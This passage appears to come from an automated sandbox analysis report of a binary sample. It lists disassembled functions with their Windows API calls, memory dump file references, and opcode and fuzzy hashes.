                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: 959972c9b27735ce92dcad6a12d7e04e81905740e181183f048c685fd0a2250a
                                                          • Instruction ID: ac40497db8f039df587af0541af076e85e96cd82b091d9cd3b63707f864e581a
                                                          • Opcode Fuzzy Hash: 959972c9b27735ce92dcad6a12d7e04e81905740e181183f048c685fd0a2250a
                                                          • Instruction Fuzzy Hash: BB313B70E016189FCB10DB69DC80B9EB7F9AF89204F20858AE419E7651DB75EE40CF60
                                                          Function 6CF79237 Relevance: 9.1, APIs: 6, Instructions: 103COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: adcf9c45ef020b87832ebb7f8308da659c9fb6055d0a8a9b9e0666c964356020
                                                          • Instruction ID: 03e3aecae3a19b724d1ed8a533ac3664044f07af29862722cdc281294ef913b5
                                                          • Opcode Fuzzy Hash: adcf9c45ef020b87832ebb7f8308da659c9fb6055d0a8a9b9e0666c964356020
                                                          • Instruction Fuzzy Hash: BF313A70E016189FCB10DFA9DC80B9EB7F9AF89204F208596E419E7651DB75EE41CF60
                                                          Function 6CF7C150 Relevance: 9.1, APIs: 6, Instructions: 99COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayCreateVector.OLEAUT32(0000000C,00000000,00000001), ref: 6CF7C180
                                                          • SafeArrayPutElement.OLEAUT32(00000000,6CF73749,?), ref: 6CF7C1B8
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7C1C4
                                                          • VariantCopy.OLEAUT32(6CF73749,?), ref: 6CF7C21B
                                                          • VariantClear.OLEAUT32(?), ref: 6CF7C22F
                                                          • SafeArrayDestroy.OLEAUT32(00000000), ref: 6CF7C23E
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArraySafeVariant$Clear$CopyCreateDestroyElementVector
                                                          • String ID:
                                                          • API String ID: 3979206172-0
                                                          • Opcode ID: fa3d06b1d1035221d4368d3c0a2aa6a6e79f7378b1ae3c419ed5f1ae954db45d
                                                          • Instruction ID: 5fc7934a0323f6572c6e4c18dad4b05ea2b4f83b07ef23f75f30f71bc0992ea3
                                                          • Opcode Fuzzy Hash: fa3d06b1d1035221d4368d3c0a2aa6a6e79f7378b1ae3c419ed5f1ae954db45d
                                                          • Instruction Fuzzy Hash: A1315E75A04209AFDB01DFA8D884F9FBBB8EF49304F11856AE915D7350EB71E901CB60
                                                          Function 6CF67370 Relevance: 9.1, APIs: 6, Instructions: 96COMMON
                                                          Download Yara Rule
                                                          APIs
                                                            • Part of subcall function 6CFB9BB5: _malloc.LIBCMT ref: 6CFB9BCF
                                                          • InitializeCriticalSection.KERNEL32(00000000,?,00000000,00000000,6CFD11FD,000000FF,?,6CF68B80,00000000,?,00000000,?,6CF68C13,?,?), ref: 6CF67415
                                                          • InitializeCriticalSection.KERNEL32(00000018,?,00000000,00000000,6CFD11FD,000000FF,?,6CF68B80,00000000,?,00000000,?,6CF68C13,?,?), ref: 6CF6741B
                                                          • std::exception::exception.LIBCMT ref: 6CF6743D
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF67452
                                                          • std::exception::exception.LIBCMT ref: 6CF67461
                                                          • __CxxThrowException@8.LIBCMT ref: 6CF67476
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C04
                                                            • Part of subcall function 6CFB9BB5: std::exception::exception.LIBCMT ref: 6CFB9C1E
                                                            • Part of subcall function 6CFB9BB5: __CxxThrowException@8.LIBCMT ref: 6CFB9C2F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: std::exception::exception$Exception@8Throw$CriticalInitializeSection$_malloc
                                                          • String ID:
                                                          • API String ID: 189561132-0
                                                          • Opcode ID: 2c2db15f68d4490eb439be2c0e40ad35da62fc48b9a79b76bd5bfa5b2d0826df
                                                          • Instruction ID: da37df21562c1be484fe3baf23c32bc9ba5ac3234643ff158bf8dbee0d2634e9
                                                          • Opcode Fuzzy Hash: 2c2db15f68d4490eb439be2c0e40ad35da62fc48b9a79b76bd5bfa5b2d0826df
                                                          • Instruction Fuzzy Hash: 6B3169B2901A489FC750CF6AC880A9AFBF4FF58310B54895EE95697B10D771FA04CBA1
                                                          Function 6CF78C6E Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: 670b64a5a0859606d201adae7cd0cdc3ac1f0c6d6ba423918dfb4fcefc3daa3c
                                                          • Instruction ID: cb8262f91adcd142b14ea8467aa53cb2f16090b8c498851228b1b70163d0cd49
                                                          • Opcode Fuzzy Hash: 670b64a5a0859606d201adae7cd0cdc3ac1f0c6d6ba423918dfb4fcefc3daa3c
                                                          • Instruction Fuzzy Hash: 25313A70E016189FDB20DB69DC80B9EB7FAAF89204F24859AE419E7641C775ED40CF60
                                                          Function 6CF78D72 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: aedb8c8734c81f2ab96900609a9617e4238b16d0ea5f0480bc7d4831b4120c87
                                                          • Instruction ID: dff4b9aa5e53f97d3047e089b068384282030e009bdbd73a4716cd3e49f5a980
                                                          • Opcode Fuzzy Hash: aedb8c8734c81f2ab96900609a9617e4238b16d0ea5f0480bc7d4831b4120c87
                                                          • Instruction Fuzzy Hash: 18315A70E016189FCB20CB69DC80B9EB7F9AF89204F21869AE419E7641D771ED40CF60
                                                          Function 6CF78E8E Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: 1ae7aa34ad47881cc89b4ea689fa2ee11976fb9cafb425400be0a0a4b4878201
                                                          • Instruction ID: faed25dea325c75878be81f203d6b38d9d5b14a2690c41c76e877221c2747c04
                                                          • Opcode Fuzzy Hash: 1ae7aa34ad47881cc89b4ea689fa2ee11976fb9cafb425400be0a0a4b4878201
                                                          • Instruction Fuzzy Hash: 97314E70E016189FDB20CFA9DC84B9EB7F9AF89204F25869AE419E7645C771ED40CF60
                                                          Function 6CF78F07 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: 223d089181698b23298e53e35c96010127e6db9baf48dcd8d6fb204503b3eed4
                                                          • Instruction ID: cdaa6811ea42f8fb3839a2966ae7e2ba8985efb8f0623acb481da635c94df1f7
                                                          • Opcode Fuzzy Hash: 223d089181698b23298e53e35c96010127e6db9baf48dcd8d6fb204503b3eed4
                                                          • Instruction Fuzzy Hash: 00313A70E016189FDB20CB69DC80B9EB7FAAF89304F25869AE419E7641C771ED40CF60
                                                          Function 6CF7884F Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: 988fd7192cb13dc0e191263a2e8145f7afeb3abed83c50f5b2e97147354578b1
                                                          • Instruction ID: 61ae8e7bf003c611d1959e3f43a0e160c4b8df5d13a97dad27b2b4a4ff384ef2
                                                          • Opcode Fuzzy Hash: 988fd7192cb13dc0e191263a2e8145f7afeb3abed83c50f5b2e97147354578b1
                                                          • Instruction Fuzzy Hash: C9313A70E016189FDB20CB69DC80B9EB7FAAF89204F24868AE419E7641C771ED41CF60
                                                          Function 6CF78B64 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE63
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE73
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE86
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AE99
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEAC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7AEBF
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: ab0752b0e2b2c9b71abbaaa35d531a9613c39bb77c21a3fb34942b74be92303a
                                                          • Instruction ID: 44cd4f843142413b77507b029934cf8c6abbbd82f546ed5cc48f4f1a21b721d5
                                                          • Opcode Fuzzy Hash: ab0752b0e2b2c9b71abbaaa35d531a9613c39bb77c21a3fb34942b74be92303a
                                                          • Instruction Fuzzy Hash: 39314C70E016189FCB20DB69DC80B9EB7FAAF99204F24858BE419E7641C775ED40CF60
                                                          Function 6CF70561 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: bc47675cf9e056093f0c41d91a15409db9876c3e375fb0163684cb0b3bb65573
                                                          • Instruction ID: 30fd825c1e6085b2a812ee960959d6ab6603bdb9cdbc93b01d29727f6156683f
                                                          • Opcode Fuzzy Hash: bc47675cf9e056093f0c41d91a15409db9876c3e375fb0163684cb0b3bb65573
                                                          • Instruction Fuzzy Hash: F7312DB0E01618DFCB60DFA9DD84B9DB7B9AF89204F34859AE418E7642C772DD408F60
                                                          Function 6CF700B4 Relevance: 9.1, APIs: 6, Instructions: 94COMMON
                                                          Download Yara Rule
                                                          APIs
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723B3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723C3
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723D6
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723E9
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF723FC
                                                          • SafeArrayDestroy.OLEAUT32(?), ref: 6CF7240F
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1662765517.000000006CF51000.00000020.00000001.01000000.00000008.sdmp, Offset: 6CF50000, based on PE: true
                                                          • Associated: 00000000.00000002.1662657072.000000006CF50000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663245604.000000006CFD4000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663399300.000000006CFEE000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663433730.000000006CFF0000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663463710.000000006CFF1000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663500199.000000006CFF3000.00000008.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663567948.000000006CFFC000.00000004.00000001.01000000.00000008.sdmpDownload File
                                                          • Associated: 00000000.00000002.1663715558.000000006CFFE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_6cf50000_file.jbxd
                                                          Similarity
                                                          • API ID: ArrayDestroySafe
                                                          • String ID:
                                                          • API String ID: 4225690600-0
                                                          • Opcode ID: ab0752b0e2b2c9b71abbaaa35d531a9613c39bb77c21a3fb34942b74be92303a
                                                          • Instruction ID: aa3adb39174891bac33d6add91719094e27741830ed10b2b522f393f7eb6245c
                                                          • Opcode Fuzzy Hash: ab0752b0e2b2c9b71abbaaa35d531a9613c39bb77c21a3fb34942b74be92303a
